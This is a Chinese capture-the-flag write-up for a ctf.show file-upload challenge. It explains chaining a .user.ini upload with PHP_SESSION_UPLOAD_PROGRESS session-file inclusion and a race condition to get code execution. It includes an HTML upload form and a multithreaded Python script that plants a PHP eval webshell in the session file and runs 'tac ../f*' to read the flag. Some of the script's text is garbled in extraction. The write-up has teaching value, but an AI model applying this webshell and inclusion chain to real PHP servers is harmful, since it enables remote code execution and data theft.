1. 这里在上面的基础上还过滤了. flag ,导致无法使用nginx日志文件了,这里用会话文件进行包含,利用PHP_SESSION_UPLOAD_PROGRESS上传进度来实现,具体原理不再阐述了,请参看文件包含-web82
  2. 这里先讲讲如何用手工去做,先构造一个上传表单,抓包上传文件,添加我们的自定义sessionid,构造我们的命令
    1. <!DOCTYPE html>
    2. <html lang="en">
    3. <head>
    4.  <meta charset="UTF-8">
    5.  <title>session upload</title>
    6. </head>
    7. <body>
    8. <form action="http://ef9b7985-b104-4bbc-94c4-596133d834f1.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
    9. <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    10. <input type="file" name="file1" />
    11. <input type="submit" />
    12. </form>
    13. </body>
    14. </html>

image-20210721110122097.png

  1. 上传我们的ma.png,发现. flag被过滤了,修改成包含我们自定义的/tmp/sess_fl目录下的会话文件,同时把上传文件名也修改成没有后缀名,这样在.user.ini中就不会再过滤
    image-20210721110334887.png
  2. 上传.user.ini
    image-20210721110359104.png
  3. 因为PHP_SESSION_UPLOAD_PROGRESS上传完成后,会清空session中的内容,所以要利用条件竞争,不断上传,不断访问,利用burpintruder模块进行竞争
    image-20210721110620408.png
  4. 下面附上python脚本 ```python

    -- coding: utf-8 --

    ‘’’ PS:前提先完成上传.user.ini和ma的前两个步骤,脚本只是完成上传upload_progress,和条件竞争 ‘’’ import requests import io import threading

url1=”http://84a97d83-62d6-422b-a3db-5c74be7d7b8a.challenge.ctf.show:8080/“ url2=url1+”upload/index.php” sess=”fl” data={“abc”:”system(‘tac ../f*’);”}

def write(session): while True: f = io.BytesIO(b’a’ 1024 50) r1=session.post(url=url1, data={“PHP_SESSION_UPLOAD_PROGRESS”:’123<?php eval($_POST[“abc”]);?>’}, cookies={“PHPSESSID”:sess}, files={‘file’: (‘1.txt’, f)})

def read(session): while True: resp = session.post(url2,data=data) if ‘1.txt’ in resp.text: print(resp.text) event.clear() else:

        # print("retry")
        pass

if name == “main“: event = threading.Event() with requests.session() as session: for i in range(0,30): threading.Thread(target=write, args=(session,)).start()

    for i in range(0,30):
        threading.Thread(target=read, args=(session,)).start()
event.set()

```